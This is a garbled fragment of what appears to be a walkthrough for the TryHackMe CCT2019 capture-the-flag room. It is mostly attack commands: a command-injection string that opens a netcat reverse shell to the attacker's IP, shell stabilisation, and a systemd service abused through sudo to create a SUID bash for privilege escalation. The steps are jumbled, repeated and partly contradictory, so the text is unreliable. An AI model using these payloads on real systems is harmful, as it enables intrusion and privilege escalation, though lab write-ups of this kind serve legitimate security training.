Cct2019 Tryhackme May 2026

Cct2019 Tryhackme May 2026

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.

127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f You should catch a shell as www-data . 3.1 Stabilize Shell python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty raw -echo; fg 3.2 Enumerate System Check /home for users:

Often in CCT2019, mandy can run python as root: cct2019 tryhackme

[Unit] Description=Privilege escalation [Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'

sudo -u mandy /bin/systemctl link /home/www-data/privesc.service sudo -u mandy /bin/systemctl start privesc.service Now /tmp/bash is a SUID binary. /tmp/bash -p Now you are mandy . cat /home/mandy/user

Test for :

gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirb/common.txt or /tmp/bash -p Now you are mandy

ls -la /home Found user: mandy